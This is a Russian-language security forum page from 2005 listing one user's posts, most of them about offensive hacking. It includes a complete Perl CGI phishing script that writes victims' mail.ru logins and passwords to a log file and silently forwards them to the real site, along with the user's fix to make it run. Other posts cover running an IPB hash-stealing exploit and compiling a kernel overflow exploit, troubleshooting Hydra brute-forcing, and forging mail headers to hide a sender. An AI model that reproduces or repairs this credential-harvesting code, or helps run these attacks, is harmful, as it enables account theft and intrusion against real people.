Security Lab



Поиск  Пользователи  Правила 
Закрыть
Логин:
Пароль:
Забыли свой пароль?
Войти  
Форум » Пользователи » Shanker
Выбрать дату в календареВыбрать дату в календаре

Страницы: Пред. 1 ... 59 60 61 62 63 64 65 66 67 68 69 70 След.
Вопрос по squid
 
#
02.08.2005 20:35:12
Я только начал изучение linux-систем и поэтому вопрос ниже может быть банальным, но всё-таки я его задам

Я правильно понимаю, что помимо прокси этот пакет предоставляет возможность фильтровать траффик? Т. е. по сути, его можно использовать и как файерволл?
"Красота - как специи, которые хорошую еду делают ещё вкуснее, а без еды есть невозможно."
 
Перейти    
[HSC Security] Invision PowerBoard 1.3.x - 2.x Exploit
 
#
01.08.2005 12:08:12
Цитата
UrSeR пишет:
блин нашел че за шняга, нету этого самого UserAgent...
может кто подскажет где взять его можно?
Я поставил полную версию ActivePerl и всё стало нормально
"Красота - как специи, которые хорошую еду делают ещё вкуснее, а без еды есть невозможно."
 
Перейти    
Как узнать движок?
 
#
01.08.2005 11:52:55
Ошибаешься: во-первых, в исходниках может значиться скин, который используется для форума. В его названии часто фигурирует названия и версии форумов. для которых он применим.
Во-вторых, часто есть в исходниках строка вида:
Код
<meta name="generator" content="vBulletin 3.0.3" />
Как видно, content сообщает имя и версию движка. Правда, и это можно изменить либо вообще убрать, но довольно часто это не делают
"Красота - как специи, которые хорошую еду делают ещё вкуснее, а без еды есть невозможно."
 
Перейти    
Получения хеша в ipb 1.x-2.x -r57ipb2.pl
 
#
27.07.2005 01:53:13
Цитата
Rex@ пишет:
Как ей разшифровать(как или чем)?????????

http://www.antichat.ru/2005/07/19/ipb-2-x.htm
"Красота - как специи, которые хорошую еду делают ещё вкуснее, а без еды есть невозможно."
 
Перейти    
Как узнать движок?
 
#
27.07.2005 01:52:16
Цитата
Rex@ пишет:
 спасибо о кукисах-буду смотреть!!

но я не понил вот это-
Цитата
Shanker пишет:
Rex@
Вообще, нужно начать с просмотра сорцов страницы: там часто пишут версию и название движка. Или вот скин к форуму - тоже пишут для какой версии и движка. Правда, версии могут не совпадать, т.к. к версиям как выше так и ниже может подходить...

Обьясни если не трудно!Пожалусто!!????

Ну, исходники страницы портала или форума или чего та ещё глянуть. Верней, исходный текст того, что ты в браузере видишь
"Красота - как специи, которые хорошую еду делают ещё вкуснее, а без еды есть невозможно."
 
Перейти    
Получения хеша в ipb 1.x-2.x -r57ipb2.pl
 
#
26.07.2005 11:32:44
Просто слеш (/) пробовал?
"Красота - как специи, которые хорошую еду делают ещё вкуснее, а без еды есть невозможно."
 
Перейти    
Как узнать движок?
 
#
26.07.2005 11:29:40
Rex@
Чесно говоря, тут нужно по-опыту определятьЖ когда уже поковырялся в установленных форумом кукисах. Например, если в строке кукисов встречается "phpbb2" - то это он и есть, версии 2.0.0. и выше. Правда, эту строку можно подменить прямо в настройках форума, но всё равно характерные черты остаются: в кукисах встречаются строчки autologinid (это ОБЯЗАТЕЛЬНО), PHPSESSID, storyread.

Для vBulletin строка с кукисами содержит: vbulletin_collapse, bblastvisit, bbuserid, bbpassword, bblastactivity, bbsessionhash

Для остальных не помню, т.к. с ними работаю много меньше. Но либо что-то похожее на название движка в кукисах можно найти, либо введя в поисковике строчку из кукисов...


Вообще, нужно начать с просмотра сорцов страницы: там часто пишут версию и название движка. Или вот скин к форуму - тоже пишут для какой версии и движка. Правда, версии могут не совпадать, т.к. к версиям как выше так и ниже может подходить...
"Красота - как специи, которые хорошую еду делают ещё вкуснее, а без еды есть невозможно."
 
Перейти    
SMTP Path Analysis - новый метод борьбы со спамом
 
#
26.07.2005 11:12:22
> о том, через какие серверы шло сообщение
Я всё ждал: когда же они до этого додумаются? Хотя пока неясно как реализовано... Я ещё года 2 назад писал статью, про то, что очень легко можно вставить в заголовки поддельные пути прохода (например, взять оригинальные с любого письма) и так запутать следы: ведь остальные служебные заголовки будут записываться поверх, в итоге мы прикинемся почтовым сервером (наш комп прикинется) и реальный аддрес компа-отправителя судя по заголовкам будет фиктивным: который мы приписали.
"Красота - как специи, которые хорошую еду делают ещё вкуснее, а без еды есть невозможно."
 
Перейти    
Проблема с брутфорсером Hydra
 
#
25.07.2005 22:26:46
Думаю, этот брутфорсер известен многим.

Проблема вот в чём: когда начинаю брут через телнет при каждом бруте от находит для одного и того же логина разные пассы, которые при проверке не подходят. Пробовал брутить ftp и ssh - такого эффекта нет.

А когда перебираю по ftp (там стоит ProFTPd 1.2.10) - через некоторое время пишет, что таймаут настал, доступа нет. И пару минут пишет вот такую штуку. Прихордится брут прибивать. Есть у кого идеи решения этих 2-х проблем?
"Красота - как специи, которые хорошую еду делают ещё вкуснее, а без еды есть невозможно."
 
Перейти    
Linux Kernel "binfmt_elf" Core Dump Local Buffer Overflow...
 
#
21.07.2005 09:57:44
Когда компилю: gcc -fno-pic -fno-stack-protector elfcd1.c -o elfcd1

Ругается на -fno-stack-protector Говорит, не знает что это
"Красота - как специи, которые хорошую еду делают ещё вкуснее, а без еды есть невозможно."
 
Перейти    
Как узнать движок?
 
#
20.07.2005 13:43:58
Ещё можно посмотреть какие кукисы установил форум и по ним определить что это за форум. Ведь url-сигнатуры могут и не помочь. Например, фиг отличишь phpbb от PNphpBB2 (этот форум поставляется для PostNuke )
"Красота - как специи, которые хорошую еду делают ещё вкуснее, а без еды есть невозможно."
 
Перейти    
Почему не работает этот cgi скрипт?
 
#
20.07.2005 01:10:07
Всё понял: нужно было после объявления функции дописать:
Код
sub parse_form {
if ($ENV{REQUEST_METHOD} eq "POST") {$mode = 0}
if ($ENV{REQUEST_METHOD} eq "GET") {$mode = 1}
if ($mode == 0) {read(STDIN, $buffer, $ENV{CONTENT_LENGTH})}
if ($mode == 1) {$buffer = $ENV{QUERY_STRING}}
@pairs = split(/ /, $buffer);
foreach $pair (@pairs) {
($name, $value) = split(/=/, $pair);
$value =~ tr/+/ /;
$value =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
$FORM{$name} = $value;
}
}
"Красота - как специи, которые хорошую еду делают ещё вкуснее, а без еды есть невозможно."
 
Перейти    
Почему не работает этот cgi скрипт?
 
#
20.07.2005 00:43:22
nmalykh
Форум надругался над моим кодом: перед parse_form должен стоять значок "энд" (и), который вводится с клавы сочетанием Shift+7.

Я такое встречал во многих скриптах и думал, что это системная функция. Разве не так?
"Красота - как специи, которые хорошую еду делают ещё вкуснее, а без еды есть невозможно."
 
Перейти    
Почему не работает этот cgi скрипт?
 
#
19.07.2005 20:13:58
Нарыл скрипт в одной статье:

Код
#!/usr/bin/perl -w
 parse_form;
# открываем файл log.txt для добавления инфы
open LOG," gt; gt;../log.txt";
# записываем туда логин и пароль от ящика
print LOG "$FORM{Login} @ $FORM{Domain}, pass:$FORM{Password}\n";
# закрываем файл
close LOG;
# все, пароль сперт!
# теперь перекидываем на mail.ru:
print "Content-Type: text/html\n\n";
print " lt;HTML gt; lt;BODY gt;\n";
# создаем ту же форму, что и на настоящем mail.ru
print " lt;form name=\"Auth\" method=post action=http://win.mail.ru/cgi-bin/auth gt;\n";
print " lt;input type=hidden name=Mpopl value=1892134183 gt;\n";
print " lt;input type=hidden name=login_from value=titul gt;\n";
print " lt;input type=hidden name=\"level\" value=1 gt;\n";
print " lt;input type=hidden name=\"Login\" value=\"$FORM{Login}\" gt;\n";
print " lt;input type=hidden name=\"Password\" value=\"$FORM{Password}\" gt;\n";
print " lt;input type=hidden name=\"Domain\" value=\"$FORM{Domain}\" gt;\n";
print " lt;input TYPE=hidden name=\"\" value=\"Войти\" gt;\n";
# без участия пользователя жмем на невидимую кнопку submit =)
print " lt;script language=jаvаscriрt gt;Auth.submit() lt;/script gt;\n";
print " lt;/form gt;\n";
print " lt;/BODY gt; lt;/HTML gt;\n";


При попытке выполнить вываливает в логи об ошибках текст:

[Tue Jul 19 17:14:40 2005] [error] [client 127.0.0.1] Undefined subroutine main::parse_form called at \\home\\12700~1.1\\cgi-bin\\VBULLE~1.CGI line 2.\n


В чём дело?
"Красота - как специи, которые хорошую еду делают ещё вкуснее, а без еды есть невозможно."
 
Перейти    
[HSC Security] Invision PowerBoard 1.3.x - 2.x Exploit
 
#
19.07.2005 17:52:31
Я так и не понял на что perl ругается? У меня у одного проблемы с исполнением скрипта?
"Красота - как специи, которые хорошую еду делают ещё вкуснее, а без еды есть невозможно."
 
Перейти    
[HSC Security] Invision PowerBoard 1.3.x - 2.x Exploit
 
#
18.07.2005 12:05:47
Что-то ругается....

Cant locate URI.pm in @INC (@INC contains: D:/Program Files/Web_codding/Perl/lib D:/Program Files/Web_codding/Perl/site/lib .) at (eval 1) line 3.

Compilation failed in require at D:/Program Files/Web_codding/Perl/site/lib/HTTP/Request.pm line 39.

Compilation failed in require at D:/Program Files/Web_codding/Perl/site/lib/LWP/UserAgent.pm line 122.

BEGIN failed--compilation aborted at D:/Program Files/Web_codding/Perl/site/lib/LWP/UserAgent.pm line 122.

Compilation failed in require at IPB.pl line 9.

BEGIN failed--compilation aborted at IPB.pl line 9.
"Красота - как специи, которые хорошую еду делают ещё вкуснее, а без еды есть невозможно."
 
Перейти    
[HSC Security] Invision PowerBoard 1.3.x - 2.x Exploit
 
#
17.07.2005 12:03:57
Обсуждение статьи [HSC Security] Invision PowerBoard 1.3.x - 2.x Exploit
"Красота - как специи, которые хорошую еду делают ещё вкуснее, а без еды есть невозможно."
 
Перейти    
Удаленный отказ в обслуживании в Microsoft Windows XP
 
#
15.07.2005 14:19:25
Действительно: что это у вас слюни текут в ожидании сплоита? Это всего лишь DoS... во всяком случае пока
"Красота - как специи, которые хорошую еду делают ещё вкуснее, а без еды есть невозможно."
 
Перейти    
Помогите ламачку
 
#
13.07.2005 13:15:19
b0nus
Что-то мне подсказывает, что он не силён в разборке исходников :)

Иваныч
Было бы неплохо на локальной машине потестить сплоиты.
Подробнее о ptrace/kmod-сплоите (его юзанию) <a href=http://www.mazafaka.ru/articlez/00000073.php rel="nofollow" target="_blank">здесь</a>
"Красота - как специи, которые хорошую еду делают ещё вкуснее, а без еды есть невозможно."
 
Перейти    
Вставить php-файл вместо аватара
 
#
13.07.2005 13:09:18
Phoenix
Кажись, статья - как раз то, что мне нужно. Жаль, что я php почти незнаю. Чтож.. придётся начать разбираться в нём :)
"Красота - как специи, которые хорошую еду делают ещё вкуснее, а без еды есть невозможно."
 
Перейти    
Страницы: Пред. 1 ... 59 60 61 62 63 64 65 66 67 68 69 70 След.